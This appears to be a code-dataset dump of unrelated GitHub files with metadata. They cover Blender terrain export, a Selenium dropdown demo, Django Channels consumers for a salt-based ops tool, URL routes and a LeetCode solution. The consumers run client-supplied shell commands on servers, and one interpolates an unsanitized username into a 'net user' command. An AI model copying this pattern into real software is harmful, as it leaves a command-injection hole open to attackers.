    return {'data':rows, 'min':Zmin, 'max':Zmax, 'depth':depth}
def save_terrain_as_NTF( path, ob ): # Tundra format - hardcoded 16x16 patch format
    """
    Bake *ob*'s terrain and write it as a Tundra .ntf heightmap.

    NOTE(review): this archived module does not import ``os`` or ``array``
    and ``clean_object_name`` is not defined here -- presumably they came
    from the original io_ogre module; verify before reviving this code.

    :param path: directory the .ntf file is written into.
    :param ob: terrain object; its x/y step counts must be multiples of 16.
    :return: dict describing the written file (url, min/max, path, name,
        patch counts and depth).
    """
    info = bake_terrain( ob )
    url = os.path.join( path, '%s.ntf' % clean_object_name(ob.data.name) )
    f = open(url, "wb")
    # Header: two uint32 values -- patches along x, patches along y.
    buf = array.array("I")
    xs = ob.collision_terrain_x_steps
    ys = ob.collision_terrain_y_steps
    xpatches = int(xs/16)
    ypatches = int(ys/16)
    header = [ xpatches, ypatches ]
    buf.fromlist( header )
    buf.tofile(f)
    # Body: one 16x16 block of float32 heights per patch.
    rows = info['data']
    for x in range( xpatches ):
        for y in range( ypatches ):
            patch = []
            for i in range(16):
                for j in range(16):
                    v = rows[ (x*16)+i ][ (y*16)+j ]
                    patch.append( v )
            buf = array.array("f")
            buf.fromlist( patch )
            buf.tofile(f)
    f.close()
    path,name = os.path.split(url)
    R = {
        'url':url, 'min':info['min'], 'max':info['max'], 'path':path, 'name':name,
        'xpatches': xpatches, 'ypatches': ypatches,
        'depth':info['depth'],
    }
    return R
class OgreCollisionOp(bpy.types.Operator):
    '''Ogre Collision

    Blender operator that switches the active mesh object's collision mode
    (NONE / PRIMITIVE / MESH / DECIMATED / TERRAIN / COMPOUND), creating the
    required hidden proxy children on demand.

    NOTE(review): ``StringProperty``, ``get_subcollisions`` and ``mathutils``
    are not defined/imported in this archived file -- presumably they came
    from the original io_ogre module; verify before reviving this code.
    '''
    bl_idname = "ogre.set_collision"
    bl_label = "modify collision"
    bl_options = {'REGISTER'}
    # Operation mode, optionally suffixed with a bounds subtype,
    # e.g. "PRIMITIVE:BOX" or just "MESH".
    MODE = StringProperty(name="toggle mode", maxlen=32, default="disable")

    @classmethod
    def poll(cls, context):
        """Operator is only available when the active object is a mesh."""
        if context.active_object and context.active_object.type == 'MESH':
            return True

    def get_subcollisions( self, ob, create=True ):
        """
        Return ob's sub-collision proxies, creating one for the current
        collision mode when none exists yet.

        :param ob: object whose collision proxies are requested.
        :param create: when True, lazily build the proxy via create_<mode>().
        :return: list of proxy objects.
        """
        r = get_subcollisions( ob )
        if not r and create:
            # Dispatch to create_DECIMATED / create_TERRAIN by mode name.
            method = getattr(self, 'create_%s'%ob.collision_mode)
            p = method(ob)
            p.name = '%s.%s' %(ob.collision_mode, ob.name)
            p.subcollision = True
            r.append( p )
        return r

    def create_DECIMATED(self, ob):
        """
        Create a hidden, locked wire-frame copy of *ob* carrying a DECIMATE
        modifier, to serve as a cheaper collision proxy.

        :param ob: source object.
        :return: the new proxy child.
        """
        child = ob.copy()
        bpy.context.scene.collection.objects.link( child )
        child.matrix_local = mathutils.Matrix()
        child.parent = ob
        child.hide_select = True
        child.draw_type = 'WIRE'
        #child.select = False
        # Lock all transforms so the proxy always follows its parent.
        child.lock_location = [True]*3
        child.lock_rotation = [True]*3
        child.lock_scale = [True]*3
        decmod = child.modifiers.new('proxy', type='DECIMATE')
        decmod.ratio = 0.5
        return child

    def create_TERRAIN(self, ob):
        """
        Create a hidden grid child shrink-wrapped onto *ob*, used as the
        heightmap sampling surface for TERRAIN collision.

        :param ob: source object.
        :return: the new grid proxy.
        """
        x = ob.collision_terrain_x_steps
        y = ob.collision_terrain_y_steps
        #################################
        #pos = ob.matrix_world.to_translation()
        bpy.ops.mesh.primitive_grid_add(
            x_subdivisions=x,
            y_subdivisions=y,
            size=1.0 ) #, location=pos )
        grid = bpy.context.active_object
        assert grid.name.startswith('Grid')
        grid.collision_terrain_x_steps = x
        grid.collision_terrain_y_steps = y
        #############################
        # Undo the parent's scale so the grid matches ob's world dimensions.
        x,y,z = ob.dimensions
        sx,sy,sz = ob.scale
        x *= 1.0/sx
        y *= 1.0/sy
        z *= 1.0/sz
        grid.scale.x = x/2
        grid.scale.y = y/2
        grid.location.z -= z/2
        grid.data.show_all_edges = True
        grid.draw_type = 'WIRE'
        grid.hide_select = True
        #grid.select = False
        grid.lock_location = [True]*3
        grid.lock_rotation = [True]*3
        grid.lock_scale = [True]*3
        grid.parent = ob
        bpy.context.scene.objects.active = ob
        # Project the grid down onto the source mesh to capture its heights.
        mod = grid.modifiers.new(name='temp', type='SHRINKWRAP')
        mod.wrap_method = 'PROJECT'
        mod.use_project_z = True
        mod.target = ob
        mod.cull_face = 'FRONT'
        return grid

    def invoke(self, context, event):
        """
        Apply the requested collision mode (self.MODE) to the active object,
        toggling display flags, game-engine settings and proxy visibility.
        """
        ob = context.active_object
        game = ob.game
        subtype = None
        if ':' in self.MODE:
            mode, subtype = self.MODE.split(':')
            ##BLENDERBUG##ob.game.collision_bounds_type = subtype # BUG this can not come before
            if subtype in 'BOX SPHERE CYLINDER CONE CAPSULE'.split():
                ob.draw_bounds_type = subtype
            else:
                ob.draw_bounds_type = 'POLYHEDRON'
            ob.game.collision_bounds_type = subtype # BLENDERBUG - this must come after draw_bounds_type assignment
        else:
            mode = self.MODE
        ob.collision_mode = mode
        # Reset all display flags; the mode branches below re-enable
        # whichever ones they need.
        if ob.data.show_all_edges:
            ob.data.show_all_edges = False
        if ob.show_texture_space:
            ob.show_texture_space = False
        if ob.show_bounds:
            ob.show_bounds = False
        if ob.show_wire:
            ob.show_wire = False
        for child in ob.children:
            if child.subcollision and not child.hide_viewport:
                child.hide_viewport = True
        if mode == 'NONE':
            game.use_ghost = True
            game.use_collision_bounds = False
        elif mode == 'PRIMITIVE':
            game.use_ghost = False
            game.use_collision_bounds = True
            ob.show_bounds = True
        elif mode == 'MESH':
            game.use_ghost = False
            game.use_collision_bounds = True
            ob.show_wire = True
            if game.collision_bounds_type == 'CONVEX_HULL':
                ob.show_texture_space = True
            else:
                ob.data.show_all_edges = True
        elif mode == 'DECIMATED':
            game.use_ghost = True
            game.use_collision_bounds = False
            game.use_collision_compound = True
            proxy = self.get_subcollisions(ob)[0]
            if proxy.hide_viewport: proxy.hide_viewport = False
            ob.game.use_collision_compound = True # proxy
            mod = _get_proxy_decimate_mod( ob )
            mod.show_viewport = True
            if not proxy.select: # ugly (but works)
                proxy.hide_select = False
                proxy.select = True
                proxy.hide_select = True
            if game.collision_bounds_type == 'CONVEX_HULL':
                ob.show_texture_space = True
        elif mode == 'TERRAIN':
            game.use_ghost = True
            game.use_collision_bounds = False
            game.use_collision_compound = True
            proxy = self.get_subcollisions(ob)[0]
            if proxy.hide_viewport:
                proxy.hide_viewport = False
        elif mode == 'COMPOUND':
            game.use_ghost = True
            game.use_collision_bounds = False
            game.use_collision_compound = True
        else:
            assert 0 # unknown mode
        return {'FINISHED'}
| OGRECave/blender2ogre | archived_code/terrain.py | terrain.py | py | 7,840 | python | en | code | 187 | github-code | 6 | [
{
"api_name": "bpy.context",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "bpy.types",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "bpy.context.scene.collection.objects.link",
"line_number": 104,
"usage_type": "call"
},
{
"api_na... |
# Bootstrap dropdowns don't use a <select> tag: inspect the dropdown,
# collect all the <li> elements under the <ul>, then loop and click the
# matching entry.
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service

# Launch the browser.
# Bug fix: use a raw string for the driver path so "\D" and "\c" are not
# treated as (invalid) escape sequences.
service_obj = Service(r"C:\Drivers\chromedriver_win32\chromedriver.exe")
driver = webdriver.Chrome(service=service_obj)
driver.implicitly_wait(10)

# Open the web application.
driver.get("https://www.dummyticket.com/dummy-ticket-for-visa-application/")
driver.maximize_window()

# Open the country dropdown, then click the wanted option.
driver.find_element(By.XPATH, "//span[@id='select2-billing_country-container']").click()
countries_list = driver.find_elements(By.XPATH, "//ul[@id='select2-billing_country-results']/li")
print(len(countries_list))
for country in countries_list:
    if country.text == "India":
        country.click()
        break
| skk99/Selenium | day13/BootstrapDropdown.py | BootstrapDropdown.py | py | 915 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "selenium.webdriver.chrome.service.Service",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 11,
"usage_type": "name"
},
{... |
71839381629 | # coding=utf-8
from __future__ import print_function
from ActionSpace import settings
from om.util import update_from_salt, syn_data_outside, fmt_salt_out, check_computer
from om.models import CallLog
from django.contrib.auth.models import User, AnonymousUser
from om.proxy import Salt
from channels.generic.websockets import JsonWebsocketConsumer
from om.models import SaltMinion
from utils.util import CheckFireWall
import traceback
import re
class OmConsumer(JsonWebsocketConsumer):
    """Base websocket consumer: audit-logs every connect and inbound frame to CallLog."""
    http_user = True

    def raw_connect(self, message, **kwargs):
        """Record the connecting user and path, then delegate to channels."""
        user = 'unknown'
        # noinspection PyBroadException
        try:
            # Anonymous sessions are recorded against a disabled placeholder user.
            not_login_user = User.objects.get_or_create(username='not_login_yet', is_active=False)[0]
            user = not_login_user if isinstance(message.user, AnonymousUser) else message.user
        except Exception as e:
            settings.logger.error(repr(e))
        CallLog.objects.create(
            user=user,
            type='message',
            action=message['path'],
            detail=message.content
        )
        settings.logger.info('recv_data:{data}'.format(data=message.content, path=message['path']))
        super(OmConsumer, self).raw_connect(message, **kwargs)

    def receive(self, content, **kwargs):
        """Audit-log each inbound frame, then delegate to channels' receive."""
        try:
            CallLog.objects.create(
                user=User.objects.get(username=self.message.user.username),
                type='message',
                action=self.message['path'],
                detail=self.message.content
            )
        except Exception as e:
            # Logging must never break message handling; record the failure
            # (and, best-effort, the offending username) and carry on.
            settings.logger.error(repr(e))
            try:
                settings.logger.error(self.message.user.username)
            except Exception as e:
                settings.logger.error(repr(e))
        settings.logger.info('recv_data:{data}'.format(data=content, path=self.message['path']))
        super(OmConsumer, self).receive(content, **kwargs)
class SaltConsumer(OmConsumer):
    """Superuser-only salt-master actions: refresh minion list, check hosts."""
    def receive(self, content, **kwargs):
        """Dispatch on content['info']; replies carry the operation result."""
        super(SaltConsumer, self).receive(content, **kwargs)
        if not self.message.user.is_authenticated:
            self.send({'result': '未授权,请联系管理员!'})
            return
        if not self.message.user.is_superuser:
            self.send({'result': '仅管理员有权限执行该操作!'})
            return
        info = content.get('info', '')
        if info == 'refresh-server':
            # Outside production the salt environment is always UAT.
            update_from_salt(None if settings.OM_ENV == 'PRD' else 'UAT')
            self.send({'result': 'Y', 'info': 'refresh-server'})
        elif info == 'check_computer':
            self.send({'return': check_computer(), 'info': 'check_computer'})
        else:
            self.send({'result': '未知操作!'})
class ServerConsumer(OmConsumer):
    """Superuser-only trigger for synchronising server data from outside sources."""
    def receive(self, content, **kwargs):
        """Only accepts content['info'] == 'syn_data_outside'."""
        super(ServerConsumer, self).receive(content, **kwargs)
        if not self.message.user.is_authenticated:
            self.send({'result': '未授权,请联系管理员!'})
            return
        if not self.message.user.is_superuser:
            self.send({'result': '仅管理员有权限执行该操作!'})
            return
        if content.get('info', None) != 'syn_data_outside':
            self.send({'result': '未知操作!'})
            return
        syn_data_outside()
        self.send({'result': 'Y'})
class ActionDetailConsumer(OmConsumer):
    """Pushes task-change notifications to clients watching an action-detail page."""
    group_prefix = 'action_detail-'
    # Canned replies broadcast to the group.
    yes = {"result": 'Y'}
    no = {"result": 'N'}

    def label(self):
        """Derive the channel group name from the task id embedded in the request path."""
        reg = r'^/om/action_detail/(?P<task_id>[0-9]+)/$'
        task_id = re.search(reg, self.message['path']).group('task_id')
        return f'{self.group_prefix}{task_id}'

    def connection_groups(self, **kwargs):
        """Subscribe each connection to its task's group."""
        return self.groups or [self.label()]

    def receive(self, content, **kwargs):
        """Any authenticated frame re-broadcasts 'Y' to the task's group."""
        super(ActionDetailConsumer, self).receive(content, **kwargs)
        if not self.message.user.is_authenticated:
            self.send({'result': '未授权,请联系管理员!'})
            return
        self.group_send(self.label(), self.yes)

    @classmethod
    def task_change(cls, task_id):
        """Server-side hook: notify all watchers that *task_id* changed."""
        settings.logger.info(f'{cls.group_prefix}{task_id}')
        ActionDetailConsumer.group_send(f'{cls.group_prefix}{task_id}', cls.yes)
class UnlockWinConsumer(OmConsumer):
    """Re-enables a locked Windows account on selected minions via `net user`."""
    def receive(self, content, **kwargs):
        """content: {'user': account name, 'server_info': [{'name': minion}, ...]}."""
        super(UnlockWinConsumer, self).receive(content, **kwargs)
        if not self.message.user.is_authenticated:
            self.send({'result': '未授权,请联系管理员!'})
            return
        user = content.get('user', None)
        server_info = content.get('server_info', None)
        if not all([user, server_info]) or not all([user.strip(), server_info]):
            self.send({'result': '参数选择错误,请检查!'})
            # NOTE(review): execution falls through after this error reply --
            # presumably a `return` was intended here; verify before relying
            # on this path.
        agents = [x['name'] for x in server_info]
        if settings.OM_ENV == 'PRD': # only the production deployment can reach both environments
            # Split the requested minions by environment and unlock each
            # side with its own salt master.
            prd_agents = list(SaltMinion.objects.filter(name__in=agents, env='PRD', os='Windows').values_list('name', flat=True))
            settings.logger.info('prd_agents:{ag}'.format(ag=repr(prd_agents)))
            uat_agents = list(SaltMinion.objects.exclude(env='PRD').filter(name__in=agents, os='Windows').values_list('name', flat=True))
            settings.logger.info('uat_agents:{ag}'.format(ag=repr(uat_agents)))
            if len(prd_agents) > 0:
                prd_result, prd_output = Salt('PRD').shell(prd_agents, f'net user {user} /active:yes')
            else:
                prd_result, prd_output = True, ''
            if len(uat_agents) > 0:
                uat_result, uat_output = Salt('UAT').shell(uat_agents, f'net user {user} /active:yes')
            else:
                uat_result, uat_output = True, ''
            salt_result = prd_result and uat_result
            salt_output = fmt_salt_out('{prd}\n{uat}'.format(prd=fmt_salt_out(prd_output), uat=fmt_salt_out(uat_output)))
        else:
            # Non-production deployments only talk to the UAT salt master.
            agents = list(SaltMinion.objects.exclude(env='PRD').filter(name__in=agents, os='Windows').values_list('name', flat=True))
            settings.logger.info('agents:{ag}'.format(ag=repr(agents)))
            if len(agents) > 0:
                salt_result, salt_output = Salt('UAT').shell(agents, 'net user {user} /active:yes'.format(user=user))
            else:
                salt_result, salt_output = True, ''
            salt_output = fmt_salt_out(salt_output)
        if salt_result:
            settings.logger.info('unlock success!')
            # Rewrite salt's raw output into user-facing messages.
            result = salt_output.replace('The command completed successfully', '解锁成功')
            result = result.replace('[{}]', '选中的机器不支持解锁,请联系基础架构同事解锁!')
            self.send({"result": result})
        else:
            settings.logger.info('unlock false for salt return false')
            self.send({"result": '解锁失败!'})
class CmdConsumer(OmConsumer):
    """Runs an ad-hoc shell command on one minion, subject to object-level permissions."""
    # noinspection PyBroadException
    def receive(self, content, **kwargs):
        """content: {'name': minion name, 'cmd': shell command, 'user': run-as user or 'NA'}."""
        super(CmdConsumer, self).receive(content, **kwargs)
        if not self.message.user.is_authenticated:
            self.send({'result': '未授权,请联系管理员!'})
            return
        name = content.get('name', '').strip()
        cmd = content.get('cmd', '').strip()
        user = content.get('user', '').strip()
        if not all([name, cmd, user]):
            self.send({'result': '参数错误!'})
            return
        try:
            pc = SaltMinion.objects.get(name=name, status='up')
            # Permission may be granted globally or per-minion (object level).
            if not any(
                [self.message.user.has_perm('om.can_exec_cmd'),
                 self.message.user.has_perm('om.can_exec_cmd', pc)]
            ):
                self.send({'result': '没有执行命令权限,请联系管理员!'})
                return
            if not any([self.message.user.has_perm('om.can_root'), self.message.user.has_perm('om.can_root', pc)]):
                if user == 'root':
                    self.send({'result': '没有root权限,请联系管理员!'})
                    return
            # 'NA' means "run as the salt default user".
            _, back = Salt(pc.env).shell(pc.name, cmd, None if user == 'NA' else user)
            self.send({'result': back['return'][0].get(name, '未知结果!')})
        except Exception as e:
            self.send({'result': f"{e}\n{content}"})
class MakeFireWallConsumer(OmConsumer):
    """Checks firewall reachability for each port between two lists of IPs."""
    # noinspection PyBroadException
    def receive(self, content, **kwargs):
        """content: s_ip/t_ip/port as '<pre>...<br>...</pre>' formatted strings."""
        super(MakeFireWallConsumer, self).receive(content, **kwargs)
        if not self.message.user.is_authenticated:
            self.send({'result': '未授权,请联系管理员!'})
            return
        s_ip = content.get('s_ip', '').strip()
        t_ip = content.get('t_ip', '').strip()
        port = content.get('port', '').strip()
        if not all([s_ip, t_ip, port]):
            self.send({'result': '参数错误!'})
            return
        # The client sends HTML-formatted lists; strip the markup and split
        # on the <br> separators.
        s_ip = s_ip.replace('<pre>', '').replace('</pre>', '').split('<br>')
        t_ip = t_ip.replace('<pre>', '').replace('</pre>', '').split('<br>')
        port = port.replace('<pre>', '').replace('</pre>', '').split('<br>')
        try:
            # Minion names end with '-<ip>'; resolve each IP to its minion.
            src_ag = [SaltMinion.objects.get(name__endswith='-'+x) for x in s_ip]
            dst_ag = [SaltMinion.objects.get(name__endswith='-'+x) for x in t_ip]
            result = []
            for p in port:
                cf = CheckFireWall(src_ag, dst_ag, int(p))
                result.append(cf.check())
            # self.message.reply_channel.send({'text': json.dumps(result)}, immediately=True)
            self.send(result)
        except Exception as e:
            # Only superusers see the traceback; everyone else gets a
            # generic error marker.
            if self.message.user.is_superuser:
                self.send({'result': f"{e}\n{traceback.format_exc()}\n{content}"})
            else:
                self.send({'result': 'error'})
class CheckFireWallConsumer(OmConsumer):
    """Firewall checks between minions selected by primary key: live port probe or policy lookup."""
    def check_port(self, src_list, dst_list, port):
        """Probe every port in *port* between the two minion lists and send the results."""
        result = []
        for p in port:
            cf = CheckFireWall(src_list, dst_list, int(p))
            result.append(cf.check())
        self.send(result)

    def check_policy(self, src_list, dst_list, port):
        """Query the firewall policy engine for the tcp services built from *port*."""
        # Imported lazily; at module import time it may not be available.
        from utils.util import FireWallPolicy
        src = ';'.join([x.ip() for x in src_list])
        dst = ';'.join([x.ip() for x in dst_list])
        srv = ','.join([f'tcp/{x}' for x in port])
        self.send({
            'src': [x.ip() for x in src_list],
            'dst': [x.ip() for x in dst_list],
            'port': port,
            'protocol': 'TCP',
            'result': FireWallPolicy(src, dst, srv).check()
        })

    def receive(self, content, **kwargs):
        """content: {'check_type': 'port'|'policy', 'src': [pk...], 'dst': [pk...], 'port': ['80 443 ...']}."""
        super(CheckFireWallConsumer, self).receive(content, **kwargs)
        if not self.message.user.is_authenticated:
            self.send({'result': '未授权,请联系管理员!'})
            return
        check_type = content.get('check_type', '')
        src = content.get('src', [])
        dst = content.get('dst', [])
        # Ports arrive as one free-form string; split on any non-word runs.
        port = [int(x) for x in re.split(r'\W+', content.get('port', [''])[0]) if x.strip() != '']
        try:
            if all([src, dst, port]):
                src_list = [x for x in SaltMinion.objects.filter(pk__in=src)]
                dst_list = [x for x in SaltMinion.objects.filter(pk__in=dst)]
                if all([src_list, dst_list]):
                    if check_type == 'port':
                        self.check_port(src_list, dst_list, port)
                    elif check_type == 'policy':
                        self.check_policy(src_list, dst_list, port)
                    else:
                        self.send({'result': '类型错误'})
        except Exception as e:
            settings.logger.error(repr(e))
            if self.message.user.is_superuser:
                self.send({'result': f"{e}\n{traceback.format_exc()}\n{content}"})
            else:
                self.send({'result': '执行报错,请联系管理员检查!'})
# Route table consumed by channels: maps websocket URL patterns to consumers.
om_routing = [
    SaltConsumer.as_route(path=r"^/om/salt_status/"),
    ActionDetailConsumer.as_route(path=r"^/om/action_detail/", attrs={'group_prefix': 'action_detail-'}),
    UnlockWinConsumer.as_route(path=r"^/om/unlock_win/"),
    CmdConsumer.as_route(path=r'^/om/admin_action/'),
    MakeFireWallConsumer.as_route(path=r'^/utils/make_firewall_table/'),
    CheckFireWallConsumer.as_route(path=r'^/utils/check_firewall/'),
    ServerConsumer.as_route(path=r'^/om/show_server/')
]
| cash2one/ActionSpace | om/worker.py | worker.py | py | 12,465 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "channels.generic.websockets.JsonWebsocketConsumer",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "django.contrib.auth.models.User.objects.get_or_create",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects",... |
15147278540 | from django.urls import path
from . import views
app_name = 'cis'

# URL routes for the CIs app: configuration items, client places,
# manufacturers and appliances.
urlpatterns = [
    path('cis/<status>/', views.CIListView.as_view(), name='ci_list'),
    path('ci/create/', views.CICreateView.as_view(), name='ci_create'),
    path('ci/upload/', views.ci_upload, name='ci_upload'),
    path('ci/<int:pk>', views.CIDetailView.as_view(), name='ci_detail'),
    path('ci/pack/send/', views.send_ci_pack, name='ci_pack_send'),
    path('places/', views.manage_client_places, name='manage_client_places'),
    path('place/create/', views.PlaceCreateView.as_view(), name='place_create'),
    path('place/<int:pk>', views.PlaceUpdateView.as_view(), name='place_update'),
    path('manufacturer/<int:pk>', views.ManufacturerDetailView.as_view(), name='manufacturer_detail'),
    path('appliances/', views.ApplianceListView.as_view(), name='appliance_list'),
    path('appliance/create/', views.ApplianceCreateView.as_view(), name='appliance_create'),
    path('appliance/<int:pk>', views.ApplianceUpdateView.as_view(), name='appliance_update'),
]
| DiegoVilela/internalize | cis/urls.py | urls.py | py | 1,043 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
73652428349 | # 给你一个下标从 0 开始的整数数组 nums 。
# 现定义两个数字的 串联 是由这两个数值串联起来形成的新数字。
# 例如,15 和 49 的串联是 1549 。
# nums 的 串联值 最初等于 0 。执行下述操作直到 nums 变为空:
# 如果 nums 中存在不止一个数字,分别选中 nums 中的第一个元素和最后一个元素,将二者串联得到的值加到 nums 的 串联值 上,然后从 nums 中删除第一个和最后一个元素。
# 如果仅存在一个元素,则将该元素的值加到 nums 的串联值上,然后删除这个元素。
# 返回执行完所有操作后 nums 的串联值。
from typing import List
class Solution:
    def findTheArrayConcVal(self, nums: List[int]) -> int:
        """Return the concatenation value of nums.

        Repeatedly concatenates the first and last elements (consuming the
        list as it goes); a lone middle element is added as-is.  Note that
        ``nums`` is emptied in place, exactly like the original version.
        """
        total = 0
        while len(nums) > 1:
            total += int(str(nums.pop(0)) + str(nums.pop()))
        if nums:
            total += nums.pop()
        return total
# Ad-hoc smoke test: the concatenation value of [7, 52, 2, 4] is
# int("74") + int("522") = 596.
nums = [7,52,2,4]
a = Solution()
print(a.findTheArrayConcVal(nums))
{
"api_name": "typing.List",
"line_number": 15,
"usage_type": "name"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.